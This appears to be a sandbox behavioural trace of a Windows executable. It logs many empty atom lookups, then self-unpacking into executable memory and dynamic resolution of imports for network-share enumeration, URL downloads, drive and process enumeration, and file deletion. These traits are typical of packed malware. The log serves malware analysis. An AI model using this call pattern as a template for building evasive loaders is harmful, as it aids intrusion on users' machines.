returned 0x0 [0040.621] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.621] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.621] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.621] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.621] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.621] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.621] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.621] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.622] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.622] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.622] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.622] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.622] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.622] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.622] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.622] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.622] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.622] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.622] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.622] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.622] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.622] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.622] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.622] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.622] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.622] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.622] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.622] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.622] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.622] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.622] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.622] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.622] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.622] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.622] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.622] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.622] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.622] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.622] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.622] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.622] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.622] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.622] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.623] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.623] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.623] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.623] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.623] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.623] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.623] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.623] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.623] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.623] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.623] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.623] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.623] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.623] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.623] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.623] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.623] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.623] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.623] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.623] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.623] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.623] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.623] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.623] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.623] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.623] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.623] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.623] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.623] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.623] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.623] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.623] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.623] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.624] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.624] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.624] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.624] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.624] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.624] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.624] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.624] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.624] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.624] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.624] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.624] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.624] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.624] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.624] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.624] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.624] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.624] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.624] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.624] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.624] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.624] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.624] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.624] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0040.938] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.944] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualProtect") returned 0x76e2435f [0040.946] LocalAlloc (uFlags=0x0, uBytes=0x90b98) returned 0x540020 [0040.956] VirtualProtect (in: lpAddress=0x540020, dwSize=0x90b98, flNewProtect=0x40, lpflOldProtect=0x18ee70 | out: lpflOldProtect=0x18ee70*=0x4) returned 1 [0041.070] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.070] GetProcAddress (hModule=0x76e10000, lpProcName="GlobalAlloc") returned 0x76e2588e [0041.070] GetProcAddress (hModule=0x76e10000, lpProcName="GetLastError") returned 0x76e211c0 [0041.070] GetProcAddress (hModule=0x76e10000, lpProcName="Sleep") returned 0x76e210ff [0041.070] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualAlloc") returned 0x76e21856 [0041.070] GetProcAddress (hModule=0x76e10000, lpProcName="CreateToolhelp32Snapshot") returned 0x76e4735f [0041.070] GetProcAddress (hModule=0x76e10000, lpProcName="Module32First") returned 0x76ea5cd9 [0041.070] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0041.070] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x58 [0041.072] Module32First (hSnapshot=0x58, lpme=0x18f420) returned 1 [0041.074] VirtualAlloc (lpAddress=0x0, dwSize=0x119e50, flAllocationType=0x1000, flProtect=0x40) returned 0x1d70000 [0041.112] GetProcAddress (hModule=0x76e10000, lpProcName="LoadLibraryA") returned 0x76e249d7 [0041.112] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.112] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualAlloc") returned 0x76e21856 [0041.112] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualProtect") returned 0x76e2435f [0041.112] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualFree") returned 0x76e2186e [0041.113] GetProcAddress (hModule=0x76e10000, lpProcName="GetVersionExA") returned 0x76e23519 [0041.113] GetProcAddress (hModule=0x76e10000, lpProcName="TerminateProcess") returned 0x76e3d802 [0041.113] GetProcAddress (hModule=0x76e10000, lpProcName="ExitProcess") returned 0x76e27a10 [0041.113] GetProcAddress (hModule=0x76e10000, lpProcName="SetErrorMode") returned 0x76e21b00 [0041.113] SetErrorMode (uMode=0x400) returned 0x0 [0041.113] SetErrorMode (uMode=0x0) returned 0x400 [0041.113] GetVersionExA (in: lpVersionInformation=0x18e350*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x3, dwPlatformId=0xffffffff, szCSDVersion="s}5w") | out: lpVersionInformation=0x18e350*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0041.113] VirtualAlloc (lpAddress=0x0, dwSize=0x119000, flAllocationType=0x1000, flProtect=0x4) returned 0x1e90000 [0041.131] VirtualProtect (in: lpAddress=0x400000, dwSize=0x137000, flNewProtect=0x40, lpflOldProtect=0x18f3d8 | out: lpflOldProtect=0x18f3d8*=0x2) returned 1 [0041.420] LoadLibraryA (lpLibFileName="RPCRT4.dll") returned 0x768e0000 [0041.421] GetProcAddress (hModule=0x768e0000, lpProcName="RpcStringFreeW") returned 0x76901635 [0041.421] GetProcAddress (hModule=0x768e0000, lpProcName="UuidCreate") returned 0x768ff48b [0041.421] GetProcAddress (hModule=0x768e0000, lpProcName="UuidToStringW") returned 0x76921ee5 [0041.421] GetProcAddress (hModule=0x768e0000, lpProcName="RpcStringFreeA") returned 0x76923fc5 [0041.421] GetProcAddress (hModule=0x768e0000, lpProcName="UuidToStringA") returned 0x7695d918 [0041.421] LoadLibraryA (lpLibFileName="MPR.dll") returned 0x74560000 [0041.607] GetProcAddress (hModule=0x74560000, lpProcName="WNetOpenEnumW") returned 0x74562f06 [0041.607] GetProcAddress (hModule=0x74560000, lpProcName="WNetEnumResourceW") returned 0x74563058 [0041.607] GetProcAddress (hModule=0x74560000, lpProcName="WNetCloseEnum") returned 0x74562dd6 [0041.607] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75190000 [0046.551] GetProcAddress (hModule=0x75190000, lpProcName="InternetCloseHandle") returned 0x751aab49 [0046.551] GetProcAddress (hModule=0x75190000, lpProcName="InternetReadFile") returned 0x751ab406 [0046.551] GetProcAddress (hModule=0x75190000, lpProcName="InternetOpenUrlW") returned 0x7520be5c [0046.552] GetProcAddress (hModule=0x75190000, lpProcName="InternetOpenW") returned 0x751b9197 [0046.552] GetProcAddress (hModule=0x75190000, lpProcName="HttpQueryInfoW") returned 0x751b5c75 [0046.552] GetProcAddress (hModule=0x75190000, lpProcName="InternetOpenA") returned 0x751bf18e [0046.552] GetProcAddress (hModule=0x75190000, lpProcName="InternetOpenUrlA") returned 0x751d30f1 [0046.552] LoadLibraryA (lpLibFileName="WINMM.dll") returned 0x74520000 [0046.902] GetProcAddress (hModule=0x74520000, lpProcName="timeGetTime") returned 0x745226e0 [0046.902] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x753b0000 [0046.902] GetProcAddress (hModule=0x753b0000, lpProcName="PathAppendA") returned 0x753bd65e [0046.903] GetProcAddress (hModule=0x753b0000, lpProcName="PathFindFileNameW") returned 0x753cbb71 [0046.903] GetProcAddress (hModule=0x753b0000, lpProcName="PathRemoveFileSpecW") returned 0x753c3248 [0046.903] GetProcAddress (hModule=0x753b0000, lpProcName="PathFileExistsA") returned 0x753ead1a [0046.903] GetProcAddress (hModule=0x753b0000, lpProcName="PathFileExistsW") returned 0x753c45bf [0046.903] GetProcAddress (hModule=0x753b0000, lpProcName="PathAppendW") returned 0x753c81ef [0046.903] GetProcAddress (hModule=0x753b0000, lpProcName="PathFindExtensionW") returned 0x753ca1b9 [0046.903] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76e10000 [0046.904] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualFree") returned 0x76e2186e [0046.904] GetProcAddress (hModule=0x76e10000, lpProcName="WriteFile") returned 0x76e21282 [0046.904] GetProcAddress (hModule=0x76e10000, lpProcName="GetDriveTypeA") returned 0x76e3ef75 [0046.904] GetProcAddress (hModule=0x76e10000, lpProcName="OpenProcess") returned 0x76e21986 [0046.904] GetProcAddress (hModule=0x76e10000, lpProcName="GlobalAlloc") returned 0x76e2588e [0046.904] GetProcAddress (hModule=0x76e10000, lpProcName="GetSystemDirectoryW") returned 0x76e25063 [0046.904] GetProcAddress (hModule=0x76e10000, lpProcName="WideCharToMultiByte") returned 0x76e2170d [0046.905] GetProcAddress (hModule=0x76e10000, lpProcName="LoadLibraryW") returned 0x76e2492b [0046.905] GetProcAddress (hModule=0x76e10000, lpProcName="Sleep") returned 0x76e210ff [0046.905] GetProcAddress (hModule=0x76e10000, lpProcName="CopyFileW") returned 0x76e4830d [0046.905] GetProcAddress (hModule=0x76e10000, lpProcName="FormatMessageW") returned 0x76e24620 [0046.905] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcpynW") returned 0x76e4d556 [0046.905] GetProcAddress (hModule=0x76e10000, lpProcName="CreateProcessA") returned 0x76e21072 [0046.906] GetProcAddress (hModule=0x76e10000, lpProcName="TerminateProcess") returned 0x76e3d802 [0046.906] GetProcAddress (hModule=0x76e10000, lpProcName="ReadFile") returned 0x76e23ed3 [0046.906] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileW") returned 0x76e23f5c [0046.906] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcatA") returned 0x76e42b7a [0046.906] GetProcAddress (hModule=0x76e10000, lpProcName="GetEnvironmentVariableA") returned 0x76e233a0 [0046.906] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcmpW") returned 0x76e25929 [0046.906] GetProcAddress (hModule=0x76e10000, lpProcName="MultiByteToWideChar") returned 0x76e2192e [0046.906] GetProcAddress (hModule=0x76e10000, lpProcName="lstrlenW") returned 0x76e21700 [0046.907] GetProcAddress (hModule=0x76e10000, lpProcName="FlushFileBuffers") returned 0x76e2469b [0046.907] GetProcAddress (hModule=0x76e10000, lpProcName="GetShortPathNameA") returned 0x76e4594d [0046.907] GetProcAddress (hModule=0x76e10000, lpProcName="GetFileSizeEx") returned 0x76e259e2 [0046.907] GetProcAddress (hModule=0x76e10000, lpProcName="GetLastError") returned 0x76e211c0 [0046.907] GetProcAddress (hModule=0x76e10000, lpProcName="SetLastError") returned 0x76e211a9 [0046.907] GetProcAddress (hModule=0x76e10000, lpProcName="GetProcAddress") returned 0x76e21222 [0046.907] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualAlloc") returned 0x76e21856 [0046.907] GetProcAddress (hModule=0x76e10000, lpProcName="MoveFileW") returned 0x76e39af0 [0046.908] GetProcAddress (hModule=0x76e10000, lpProcName="FindClose") returned 0x76e24442 [0046.908] GetProcAddress (hModule=0x76e10000, lpProcName="Process32FirstW") returned 0x76e48baf [0046.908] GetProcAddress (hModule=0x76e10000, lpProcName="LocalAlloc") returned 0x76e2168c [0046.908] GetProcAddress (hModule=0x76e10000, lpProcName="CreateEventW") returned 0x76e2183e [0046.908] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleFileNameA") returned 0x76e214b1 [0046.908] GetProcAddress (hModule=0x76e10000, lpProcName="Process32NextW") returned 0x76e4896c [0046.908] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcatW") returned 0x76e4828e [0046.908] GetProcAddress (hModule=0x76e10000, lpProcName="CreateMutexA") returned 0x76e24c6b [0046.909] GetProcAddress (hModule=0x76e10000, lpProcName="FindNextFileW") returned 0x76e254ee [0046.909] GetProcAddress (hModule=0x76e10000, lpProcName="CreateToolhelp32Snapshot") returned 0x76e4735f [0046.909] GetProcAddress (hModule=0x76e10000, lpProcName="SetEnvironmentVariableA") returned 0x76e2e331 [0046.909] GetProcAddress (hModule=0x76e10000, lpProcName="DeleteFileW") returned 0x76e289b3 [0046.909] GetProcAddress (hModule=0x76e10000, lpProcName="LocalFree") returned 0x76e22d3c [0046.909] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcpyW") returned 0x76e43102 [0046.909] GetProcAddress (hModule=0x76e10000, lpProcName="DeleteFileA") returned 0x76e25444 [0046.909] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcpyA") returned 0x76e42a9d [0046.910] GetProcAddress (hModule=0x76e10000, lpProcName="SetPriorityClass") returned 0x76e3cf28 [0046.910] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentProcess") returned 0x76e21809 [0046.910] GetProcAddress (hModule=0x76e10000, lpProcName="GetComputerNameW") returned 0x76e2dd0e [0046.910] GetProcAddress (hModule=0x76e10000, lpProcName="GetLogicalDrives") returned 0x76e25371 [0046.910] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleFileNameW") returned 0x76e24950 [0046.910] GetProcAddress (hModule=0x76e10000, lpProcName="SetStdHandle") returned 0x76ea454f [0046.911] GetProcAddress (hModule=0x76e10000, lpProcName="GetVersion") returned 0x76e24467 [0046.911] GetProcAddress (hModule=0x76e10000, lpProcName="CreateDirectoryA") returned 0x76e4d526 [0046.911] GetProcAddress (hModule=0x76e10000, lpProcName="CreateThread") returned 0x76e234d5 [0046.911] GetProcAddress (hModule=0x76e10000, lpProcName="CompareStringW") returned 0x76e23bca [0046.911] GetProcAddress (hModule=0x76e10000, lpProcName="GetTimeFormatW") returned 0x76e3f481 [0046.911] GetProcAddress (hModule=0x76e10000, lpProcName="GetDateFormatW") returned 0x76e434d7 [0046.912] GetProcAddress (hModule=0x76e10000, lpProcName="EnumSystemLocalesW") returned 0x76ea425f [0046.912] GetProcAddress (hModule=0x76e10000, lpProcName="GetUserDefaultLCID") returned 0x76e23da5 [0046.912] GetProcAddress (hModule=0x76e10000, lpProcName="IsValidLocale") returned 0x76e3ce46 [0046.912] GetProcAddress (hModule=0x76e10000, lpProcName="GetLocaleInfoW") returned 0x76e23c42 [0046.912] GetProcAddress (hModule=0x76e10000, lpProcName="CreateSemaphoreW") returned 0x76e3ca5a [0046.912] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleHandleW") returned 0x76e234b0 [0046.913] GetProcAddress (hModule=0x76e10000, lpProcName="GetTickCount") returned 0x76e2110c [0046.913] GetProcAddress (hModule=0x76e10000, lpProcName="TlsFree") returned 0x76e23587 [0046.913] GetProcAddress (hModule=0x76e10000, lpProcName="TlsSetValue") returned 0x76e214fb [0046.913] GetProcAddress (hModule=0x76e10000, lpProcName="TlsGetValue") returned 0x76e211e0 [0046.913] GetProcAddress (hModule=0x76e10000, lpProcName="TlsAlloc") returned 0x76e249ad [0046.913] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76e21916 [0046.914] GetProcAddress (hModule=0x76e10000, lpProcName="SetUnhandledExceptionFilter") returned 0x76e287c9 [0046.914] GetProcAddress (hModule=0x76e10000, lpProcName="UnhandledExceptionFilter") returned 0x76e4772f [0046.914] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleHandleA") returned 0x76e21245 [0046.914] GetProcAddress (hModule=0x76e10000, lpProcName="GetVersionExA") returned 0x76e23519 [0046.914] GetProcAddress (hModule=0x76e10000, lpProcName="GlobalMemoryStatus") returned 0x76e28b6d [0046.914] GetProcAddress (hModule=0x76e10000, lpProcName="LoadLibraryA") returned 0x76e249d7 [0046.914] GetProcAddress (hModule=0x76e10000, lpProcName="FlushConsoleInputBuffer") returned 0x76ec7a9f [0046.915] GetProcAddress (hModule=0x76e10000, lpProcName="WaitForSingleObject") returned 0x76e21136 [0046.915] GetProcAddress (hModule=0x76e10000, lpProcName="CreateDirectoryW") returned 0x76e24259 [0046.915] GetProcAddress (hModule=0x76e10000, lpProcName="SetFilePointerEx") returned 0x76e3c807 [0046.915] GetProcAddress (hModule=0x76e10000, lpProcName="CreateProcessW") returned 0x76e2103d [0046.915] GetProcAddress (hModule=0x76e10000, lpProcName="FreeLibrary") returned 0x76e234c8 [0046.915] GetProcAddress (hModule=0x76e10000, lpProcName="SetErrorMode") returned 0x76e21b00 [0046.915] GetProcAddress (hModule=0x76e10000, lpProcName="lstrlenA") returned 0x76e25a4b [0046.915] GetProcAddress (hModule=0x76e10000, lpProcName="SetFilePointer") returned 0x76e217d1 [0046.916] GetProcAddress (hModule=0x76e10000, lpProcName="FindFirstFileW") returned 0x76e24435 [0046.916] GetProcAddress (hModule=0x76e10000, lpProcName="SetConsoleMode") returned 0x76e3a77d [0046.916] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0046.916] GetProcAddress (hModule=0x76e10000, lpProcName="GetCommandLineW") returned 0x76e25223 [0046.916] GetProcAddress (hModule=0x76e10000, lpProcName="GetNumberOfConsoleInputEvents") returned 0x76ec793f [0046.916] GetProcAddress (hModule=0x76e10000, lpProcName="PeekConsoleInputA") returned 0x76ec6f0d [0046.916] GetProcAddress (hModule=0x76e10000, lpProcName="FreeEnvironmentStringsW") returned 0x76e251cb [0046.917] GetProcAddress (hModule=0x76e10000, lpProcName="GetEnvironmentStringsW") returned 0x76e251e3 [0046.917] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentProcessId") returned 0x76e211f8 [0046.917] GetProcAddress (hModule=0x76e10000, lpProcName="QueryPerformanceCounter") returned 0x76e21725 [0046.918] GetProcAddress (hModule=0x76e10000, lpProcName="GetTimeZoneInformation") returned 0x76e2465a [0046.918] GetProcAddress (hModule=0x76e10000, lpProcName="RaiseException") returned 0x76e258a6 [0046.918] GetProcAddress (hModule=0x76e10000, lpProcName="GetStringTypeW") returned 0x76e21946 [0046.918] GetProcAddress (hModule=0x76e10000, lpProcName="GetConsoleCP") returned 0x76ec7bff [0046.918] GetProcAddress (hModule=0x76e10000, lpProcName="ReadConsoleW") returned 0x76ec739a [0046.918] GetProcAddress (hModule=0x76e10000, lpProcName="GetConsoleMode") returned 0x76e21328 [0046.919] GetProcAddress (hModule=0x76e10000, lpProcName="HeapSize") returned 0x77353002 [0046.919] GetProcAddress (hModule=0x76e10000, lpProcName="LoadLibraryExW") returned 0x76e2495d [0046.919] GetProcAddress (hModule=0x76e10000, lpProcName="OutputDebugStringW") returned 0x76e4d1d4 [0046.919] GetProcAddress (hModule=0x76e10000, lpProcName="SetConsoleCtrlHandler") returned 0x76e28a09 [0046.919] GetProcAddress (hModule=0x76e10000, lpProcName="RtlUnwind") returned 0x76e4d1c3 [0046.919] GetProcAddress (hModule=0x76e10000, lpProcName="FatalAppExitA") returned 0x76ea4691 [0046.919] GetProcAddress (hModule=0x76e10000, lpProcName="GetStartupInfoW") returned 0x76e24d40 [0046.920] GetProcAddress (hModule=0x76e10000, lpProcName="GetExitCodeProcess") returned 0x76e3174d [0046.920] GetProcAddress (hModule=0x76e10000, lpProcName="LCMapStringW") returned 0x76e217b9 